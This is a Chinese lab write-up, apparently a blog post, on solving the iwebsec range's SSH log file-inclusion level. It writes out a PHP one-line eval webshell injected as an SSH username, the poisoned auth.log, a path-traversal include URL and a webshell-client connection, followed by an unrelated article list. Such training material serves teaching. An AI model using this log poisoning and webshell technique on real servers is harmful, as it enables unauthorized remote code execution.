当前位置: 首页 > ds >正文

iwebsec靶场 文件包含关卡通关笔记11-ssh日志文件包含

目录

日志包含

1.构造恶意ssh登录命令

2.配置ssh日志开启

(1)配置sshd

(2)配置rsyslog

(3)重启服务

3.写入webshell木马

4.获取php信息渗透

5.蚁剑连接


日志包含

1.构造恶意ssh登录命令

ssh服务如果开启了日志记录功能,那么在进行ssh连接时会将登录的日志记录到ssh日志文件内,这个文件的默认路径是/var/log/auth.log。那么可以通过将连接用户名设置为恶意代码,用命令连接服务器iwebsec的服务器,这样就可以将恶意代码写入到日志文件中。

用户名设置为为如下一句话木马脚本,参数为ljn

"<?php @eval(\$POST[ljn];?>"

2.配置ssh日志开启

(1)配置sshd

文件地址为/etc/ssh/sshd_config

SyslogFacility AUTHPRIV
LogLevel INFO

(2)配置rsyslog

ubuntu系统中文件地址为/etc/rsyslog.conf

# The authpriv file has restricted access.
authpriv.*                                              /var/log/auth.log

(3)重启服务

配置完毕后务必要记住重启服务,否则修改不生效

service sshd restart
service rsyslog restart

重启后效果如下

为了避免之前/var/log/auth.log中内容对渗透造成影响,故而将此文件先清空,如下所示:

3.写入webshell木马

此实验只是为了验证这个漏洞的存在,故而在iwebsec靶场的容器内执行,如下所示通过用户名向日志写入一句话马,参数为ljn,命令如下所示

ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1

执行完整交互如下所示:

[root@bc23a49cb37c /]# ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

 查看/var/log/auth.log 文件,发现已经将恶意的一句话木马通过登录用户写入到了ssh登录日志中,如下所示

[root@bc23a49cb37c /]# cat /var/log/auth.log 
Nov 28 07:07:07 bc23a49cb37c sshd[852]: Invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1
Nov 28 07:07:07 bc23a49cb37c sshd[853]: input_userauth_request: invalid user <?php @eval($_POST[ljn]);?>
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed none for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[853]: Connection closed by 127.0.0.1

这里如果没有生成日志的话,建议重启一下sshd服务与rsyslog服务再次重试

service rsyslog restart
Shutting down system logger:                               [  OK  ]
Starting system logger:                                    [  OK  ]

4.获取php信息渗透

ssh登录的日志名为/var/log/auth.log

于是构造日志访问路径 filename=../../../../var/log/auth.log

利用文件包含第01关卡进行渗透

http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.loghttp://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log渗透如下所示

5.蚁剑连接

添加url和密码,分别为http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log和ljn,如下所示

进入文件管理模块

如上所示,渗透成功

http://www.xdnf.cn/news/720.html

相关文章:

  • Boost.Asio 确实属于 异步非阻塞模型
  • 多模态大语言模型arxiv论文略读(三十一)
  • 高并发场景下重试策略的演进设计
  • 【Linux】Rhcsa复习4
  • 亚马印象建材:推出“200×1200和300×1800数码釉木纹砖”新品
  • 树莓派超全系列教程文档--(36)树莓派条件过滤器设置
  • 奇异递归模板设计模式-CRTP
  • 32-工艺品商城小程序
  • 深入浅出讲解UDP检验中如何计算检验和
  • 标准的JNI (Java Native Interface) 加载函数 JNI_OnLoad
  • 4.凸包-Graham Scan
  • Spring Boot 版本与对应 JDK 版本兼容性
  • SpringCloud小白入门+项目搭建
  • `ImadcnIdentifierGenerator` 深度解析
  • 豆瓣图书数据采集与可视化分析(二)- 豆瓣图书数据清洗与处理
  • priority_queue优先级队列的模拟实现
  • 计算机视觉与深度学习 | RNN原理,公式,代码,应用
  • 手写call,bind,apply
  • 博客系统案例练习2-用户注册-redis
  • 1.69G 雨晨 26100.3909 Windows 11 IoT 企业版 LTSC 24H2 极简
  • ebpf: CO-RE, BTF, and Libbpf(三)
  • BurpSuite 1.4.07 详细使用指南:安装、配置与渗透测试实战
  • OpenCV 模板与多个对象匹配方法详解(继OpenCV 模板匹配方法详解)
  • 零基础上手Python数据分析 (19):Matplotlib 高级图表定制 - 精雕细琢,让你的图表脱颖而出!
  • 初级达梦dba的技能水准
  • C++:详解命名空间
  • 清醒思考的艺术
  • 二叉树的顺序结构及实现
  • 【第一天】一月速通python,第一天基本语法
  • ZYNQ笔记(九):定时器中断